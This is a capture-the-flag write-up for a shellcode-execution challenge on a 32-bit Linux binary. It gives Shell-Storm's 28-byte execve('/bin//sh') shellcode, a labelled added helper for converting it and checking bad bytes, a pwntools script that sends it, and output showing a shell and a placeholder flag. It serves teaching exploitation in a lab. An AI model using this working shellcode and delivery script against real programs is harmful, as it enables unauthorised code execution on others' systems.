This challenge asks you to write some shellcode, which it then executes for you. It's an x86 executable with minimal protections:
$ checksec ./chall
[*] '/ironforge/chall'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
We'll discuss writing shellcode later. For now, we'll grab ready-made shellcode from Shell-Storm. Since we want a shell on x86, Shell-Storm entry 811 does the job:
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73"
                   "\x68\x68\x2f\x62\x69\x6e\x89"
                   "\xe3\x89\xc1\x89\xc2\xb0\x0b"
                   "\xcd\x80\x31\xc0\x40\xcd\x80";
We can pretty easily format this to Python (or even Bash):
sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
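As an added example (not part of the original writeup), here is a small helper that does the Shell-Storm C-literal to Python bytes conversion mechanically and sanity-checks the result for 0x00 and 0x0a bytes, which would cut the input short if the target reads it with a C string or line function. The function names and the forbidden-byte list are my own choices.

```python
import re

# Shell-Storm 811 exactly as it is quoted above, as a Python str holding
# the C source text (so the backslashes are literal characters here).
SHELLSTORM_C = (
    '"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73" "\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89" '
    '"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b" "\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80"'
)


def c_literal_to_bytes(text: str) -> bytes:
    """Join adjacent C string fragments and decode their \\xNN escapes."""
    fragments = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text)
    joined = "".join(fragments)
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", joined))


def bad_bytes(sc: bytes, forbidden=(0x00, 0x0A)) -> dict:
    """Map each forbidden byte that occurs in sc to the offsets where it appears.

    0x00 terminates C strings; 0x0a ends a line for fgets()-style readers, and
    p.sendline() adds its own newline, so the payload itself must not contain one.
    """
    return {b: [i for i, x in enumerate(sc) if x == b] for b in forbidden if b in sc}


def to_python_literal(sc: bytes) -> str:
    """Render bytes as the b"\\x.." form used in the exploit script."""
    return 'b"' + "".join(f"\\x{x:02x}" for x in sc) + '"'


if __name__ == "__main__":
    sc = c_literal_to_bytes(SHELLSTORM_C)
    print(f"{len(sc)} bytes, bad bytes: {bad_bytes(sc) or 'none'}")
    print(to_python_literal(sc))
```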
We can then send this using Pwntools:
from pwn import *

# Loading the binary into context.binary sets arch/bits for pwntools
# and lets process() pick up the path without repeating it.
elf = context.binary = ELF("./chall")
p = process()

# Shell-Storm 811: execve("/bin//sh") on 32-bit Linux, 28 bytes.
sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

# The challenge reads our input and jumps to it, so just send the bytes.
p.sendline(sc)
p.interactive()
Running this script gives us:
$ python3 asd.py
[*] '/ironforge/chall'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
[+] Starting local process '/ironforge/chall': pid 140651
[*] Switching to interactive mode
Give me some some code! I'll execute it for you.
>
Thank you!
$ ls
asd.py chall flag.txt
$ cat flag.txt
IFC{PL4C3H0LD3R_FL4G_H3R3!}
$ exit
[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code 0 (pid 140651)
[*] Got EOF while sending in interactive